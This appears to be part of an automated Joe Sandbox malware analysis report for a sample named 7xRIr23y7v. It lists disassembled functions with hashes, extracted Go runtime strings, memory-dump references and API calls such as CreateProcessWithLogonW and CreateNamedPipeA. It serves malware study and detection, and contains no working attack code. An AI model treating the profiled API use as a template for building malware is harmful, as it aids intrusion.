Asia East Standard Timead
API String ID: 0-1394149306
Opcode ID: 756eaa33598f264a966e2b3984dbe6ce90627cb51854482ce138f853c431fcb4
Instruction ID: 54afaacea10c5e3b309c3ed612669278430251e52d2aca5b219439403d424f65
Opcode Fuzzy Hash: 756eaa33598f264a966e2b3984dbe6ce90627cb51854482ce138f853c431fcb4
Instruction Fuzzy Hash: 6EB19136609F84C6D714CF29E48539EB765F79AB80F148222EF9D83B56CB39C581CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00812920 Relevance: 5.2, Strings: 4, Instructions: 242COMMON

Download Yara Rule

Strings

runtime., xrefs: 00812B30
runtime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcwait for GC cyclewrong, xrefs: 00812B63
reflect., xrefs: 00812B94
bad restart PCbad span statefile too largefinalizer waitgcstoptheworldgetprotobynameinvalid syntaxis a directorylevel 2 haltedlevel 3 haltednil elem type!no module datano such deviceprotocol errorruntime: full=runtime: want=s.allocCount= semaRoot queuestack ov, xrefs: 00812C82

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: bad restart PCbad span statefile too largefinalizer waitgcstoptheworldgetprotobynameinvalid syntaxis a directorylevel 2 haltedlevel 3 haltednil elem type!no module datano such deviceprotocol errorruntime: full=runtime: want=s.allocCount= semaRoot queuestack ov$reflect.$runtime.$runtime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcwait for GC cyclewrong
API String ID: 0-1466834464
Opcode ID: 9238bb5a983db729a06dd52ea5456c42977e74ea77d7e9f40a0f45ad642d13cd
Instruction ID: b6d60884d627a505a7353c7b97c55e5582e4ee64a704f376a2ea911a3574b8de
Opcode Fuzzy Hash: 9238bb5a983db729a06dd52ea5456c42977e74ea77d7e9f40a0f45ad642d13cd
Instruction Fuzzy Hash: 64918072708B80C6DB10CF15E08039EA766FB88BD4F988125EB8D87B59DB7CC4A5CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0080EF80 Relevance: 4.0, Strings: 3, Instructions: 272COMMON

Download Yara Rule

Strings

runtime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject unexpected; result=runtime: waitforsingleobject wait_failed; errno=slice bounds out of range [:%x] with capacity %ycasgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on , xrefs: 0080F3E5
runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type attempted to add zero-sized address rangebinary: varint overflows a 64-bit integergcSweep being done, xrefs: 0080F40F
self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.n, xrefs: 0080F425

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: runtime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject unexpected; result=runtime: waitforsingleobject wait_failed; errno=slice bounds out of range [:%x] with capacity %ycasgstatus: waiting for Gwaiting but is Grunnabledelayed zeroing on $runtime.preemptM: duplicatehandle failedruntime: SyscallN has too many argumentsruntime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type attempted to add zero-sized address rangebinary: varint overflows a 64-bit integergcSweep being done$self-preemptshort bufferspanSetSpinesweepWaiterstraceStringswirep: p->m=worker mode != sweepgen MB globals, MB) workers= called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.n
API String ID: 0-4222696518
Opcode ID: 28826c5a8b4e611b2c8bd1e658970930369bd85a05154835b570d03ee310feb7
Instruction ID: 1d803251187fd3fccaac170d6530e9caf3471cbabe1585c3693ddc9d7eeebfa2
Opcode Fuzzy Hash: 28826c5a8b4e611b2c8bd1e658970930369bd85a05154835b570d03ee310feb7
Instruction Fuzzy Hash: F3C17036609F80C1CB61DF25E84136AB764F74AB90F459236DB9C93B96DF38C581CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7482B0 Relevance: 3.4, Strings: 2, Instructions: 884COMMON

Download Yara Rule

Strings

, xrefs: 0000017DEA748963
<, xrefs: 0000017DEA74896E

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID:
String ID: $<
API String ID: 0-428540627
Opcode ID: 1c0fd6758a375fb896b6b7ba35f9678d2cb0a137428ce70669a8171ac9488278
Instruction ID: be8b608db47699fcece61edaaca9d9d17e0c8e67b2765061fe38a092f4270b44
Opcode Fuzzy Hash: 1c0fd6758a375fb896b6b7ba35f9678d2cb0a137428ce70669a8171ac9488278
Instruction Fuzzy Hash: C592DEB2329A4187DB59CB19E4A173AB7A1F3C8B84F44513AEB9B87794CE3CC551CB04

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA730520 Relevance: 3.0, APIs: 2, Instructions: 32processCOMMON

Download Yara Rule

APIs

CreateProcessWithLogonW.ADVAPI32 ref: 0000017DEA73056F
GetLastError.KERNEL32 ref: 0000017DEA730580

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CreateErrorLastLogonProcessWith
String ID:
API String ID: 2609480667-0
Opcode ID: 8c3b69867e2f18b0b8484ce0fc92ad6db406229b249492cefc87526ec242343a
Instruction ID: b52be4988c1a38a10dddd5bf2918678565b527031e4e22a2b309c7f8ae575841
Opcode Fuzzy Hash: 8c3b69867e2f18b0b8484ce0fc92ad6db406229b249492cefc87526ec242343a
Instruction Fuzzy Hash: A6014F72328B0982E751DB25E4487A937B4F788BD0F150135CE9D4F351DF39C5968751

Uniqueness

Uniqueness Score: -1.00%

Function 0081ADE0 Relevance: 2.7, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

internal lockOSThread errorinvalid profile bucket typekey was rejected by servicemakechan: size out of rangemakeslice: cap out of rangemakeslice: len out of rangemspan.sweep: bad span statenot a XENIX named type fileprogToPointerMask: overflowrunlock of unlock, xrefs: 0081B0AF
invalid m->lockedInt = left over markroot jobsmakechan: bad alignmentmissing type in runfinqnanotime returning zerono space left on deviceoperation not permittedoperation not supportedpanic during preemptoffprocresize: invalid argreflect.methodValueCallruntime, xrefs: 0081B086

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: internal lockOSThread errorinvalid profile bucket typekey was rejected by servicemakechan: size out of rangemakeslice: cap out of rangemakeslice: len out of rangemspan.sweep: bad span statenot a XENIX named type fileprogToPointerMask: overflowrunlock of unlock$invalid m->lockedInt = left over markroot jobsmakechan: bad alignmentmissing type in runfinqnanotime returning zerono space left on deviceoperation not permittedoperation not supportedpanic during preemptoffprocresize: invalid argreflect.methodValueCallruntime
API String ID: 0-4048334577
Opcode ID: 40f5643f5fb5e7ec801957a15132a17cfd024753b69ab4a961073f5877419bf7
Instruction ID: d69b9d10eb972d0cf183e93fdf43023f7cf9805d3d2502cdca9ac2aed030d780
Opcode Fuzzy Hash: 40f5643f5fb5e7ec801957a15132a17cfd024753b69ab4a961073f5877419bf7
Instruction Fuzzy Hash: E671A072605F84C6D714DF24E4403DEB365FB49B88F459222DA8DA775ACF38C986C742

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA33B58F Relevance: 1.8, APIs: 1, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

_initp_misc_winsig.LIBCMT ref: 0000017DEA33B5C3

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _initp_misc_winsig
String ID:
API String ID: 2710132595-0
Opcode ID: f979b4f846a1532242f867160a3529d6f986bc3965b079700d489e21b19d91cf
Instruction ID: 91350a7bfc35df9e4bbccca4c80ae422d1e7b5dd38ed3de68a6a174f5b58fc88
Opcode Fuzzy Hash: f979b4f846a1532242f867160a3529d6f986bc3965b079700d489e21b19d91cf
Instruction Fuzzy Hash: 69A1CA71A19A088FFF94FF65ED98AA937A2F778301721893A900AC7174DABCD545CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00823520 Relevance: 1.6, Strings: 1, Instructions: 391COMMON

Download Yara Rule

Strings

!"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 00823610, 008236F0, 00823810, 0082390E

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
API String ID: 0-2911004680
Opcode ID: a7b6287495b23d7dcbf9348fba15f4b1bf0443d818a86cb6bbab71784729f0ae
Instruction ID: f68d4b3afedc7f1da7f16234061cddc1bb603f68bfb7befa9bdf099f46580ba7
Opcode Fuzzy Hash: a7b6287495b23d7dcbf9348fba15f4b1bf0443d818a86cb6bbab71784729f0ae
Instruction Fuzzy Hash: B8E1E6A2305BA882DB048B05F5203ADA767F795BD0F448532DA9E97B98DF7CC6C4C741

Uniqueness

Uniqueness Score: -1.00%

Function 0082CC60 Relevance: 1.6, Strings: 1, Instructions: 319COMMON

Download Yara Rule

Strings

invalid length of trace eventio: read/write on closed pipemachine is not on the networkno XENIX semaphores availablenotesleep - waitm out of syncnumerical result out of rangeoperation already in progresspadding contained in alphabetprotocol family not supporte, xrefs: 0082CF28

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: invalid length of trace eventio: read/write on closed pipemachine is not on the networkno XENIX semaphores availablenotesleep - waitm out of syncnumerical result out of rangeoperation already in progresspadding contained in alphabetprotocol family not supporte
API String ID: 0-2915194405
Opcode ID: 6f3244cc74a74528c9c990409756bfa8403bf8f42259262e2cfc5be49efa3107
Instruction ID: 6f1593b357db4e02fd23b9f3f9067fc40ca76f83413c9c5662254c48f9746673
Opcode Fuzzy Hash: 6f3244cc74a74528c9c990409756bfa8403bf8f42259262e2cfc5be49efa3107
Instruction Fuzzy Hash: 0AD1C762219BEC82DB548B19F0503AE7B61F395BC0F548126EF9A87B95CF38C4D1DB81

Uniqueness

Uniqueness Score: -1.00%

Function 008027C0 Relevance: 1.6, Strings: 1, Instructions: 319COMMON

Download Yara Rule

Strings

grew heap, but no adequate free space foundinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemultiple Read calls return no data or errornon in-use span found with specials bit setroot level max pages doesn't fit in summaryru, xrefs: 00802CFA

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: grew heap, but no adequate free space foundinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemultiple Read calls return no data or errornon in-use span found with specials bit setroot level max pages doesn't fit in summaryru
API String ID: 0-1203420704
Opcode ID: 970b04a4d41b41ffc57ca94e995b33082b31f58bd1d798b40d47242270721973
Instruction ID: 39e82a68d21e2011e9874135194b031a555b0029ab5885dff25f41f5d292bd7b
Opcode Fuzzy Hash: 970b04a4d41b41ffc57ca94e995b33082b31f58bd1d798b40d47242270721973
Instruction Fuzzy Hash: 23D18F72309B8885DBA4CF25F89475AB760F789BD0F549126EE8D83BA9DF78C454CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72FBD4 Relevance: 1.5, APIs: 1, Instructions: 33pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32 ref: 0000017DEA72FC3E

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: 88128a2f84ef20eecdeca96ae74b5b122944d5d2c2f23dbbb35e489b4142ab44
Instruction ID: b97abadc8c8b2da1bd478b3d49fa2ede6f69ef63df5b0e2232d16bb99c6a3162
Opcode Fuzzy Hash: 88128a2f84ef20eecdeca96ae74b5b122944d5d2c2f23dbbb35e489b4142ab44
Instruction Fuzzy Hash: E501AD72108B4A86EB12EB10F8403E977F0EBD9365F24472896ED0A2D4EF3CC219C741

Uniqueness

Uniqueness Score: -1.00%

Function 007EFD60 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

bulkBarrierPreWrite: unaligned argumentscannot free workbufs when work.full != 0failed to acquire lock to reset capacityinvalid span in heapArena for user arenamarkWorkerStop: unknown mark worker modemust be able to track idle limiter eventrefill of span with , xrefs: 007F004F

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: bulkBarrierPreWrite: unaligned argumentscannot free workbufs when work.full != 0failed to acquire lock to reset capacityinvalid span in heapArena for user arenamarkWorkerStop: unknown mark worker modemust be able to track idle limiter eventrefill of span with
API String ID: 0-296158057
Opcode ID: ade728ae832e97664b7007f01b6dc4cd9e1e9e0642af79b0389de14879314e0c
Instruction ID: 8e2e50732c3fe29847afd743519bb8335973360db650be0c0aeeeece811bd6e0
Opcode Fuzzy Hash: ade728ae832e97664b7007f01b6dc4cd9e1e9e0642af79b0389de14879314e0c
Instruction Fuzzy Hash: B6718CB6716AD4C2DB149F16E50439AA7A6F789BC0F589036EF8D07B1ADF3CC4A18700

Uniqueness

Uniqueness Score: -1.00%

Function 00807AA0 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

bad summary databad symbol tablecastogscanstatusgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remoterefl, xrefs: 00807D26

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: bad summary databad symbol tablecastogscanstatusgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remoterefl
API String ID: 0-3506635707
Opcode ID: f1e7c0a259cdf7e7db7807b58e319207e6b581dee49ea24b5f9d0a138bcc4603
Instruction ID: 6a24c0ee32a9e23ae49327f530c8a2f93699899912388932500a6bb2ecc0f67d
Opcode Fuzzy Hash: f1e7c0a259cdf7e7db7807b58e319207e6b581dee49ea24b5f9d0a138bcc4603
Instruction Fuzzy Hash: 5151FFB3614B8882DB409F19E8403AA7765F789BE0F445226EFAD837D9CF78D094C780

Uniqueness

Uniqueness Score: -1.00%

Function 007F4DE0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

gcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not ArabicBrahmiCarian, xrefs: 007F4F52, 007F4F69

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
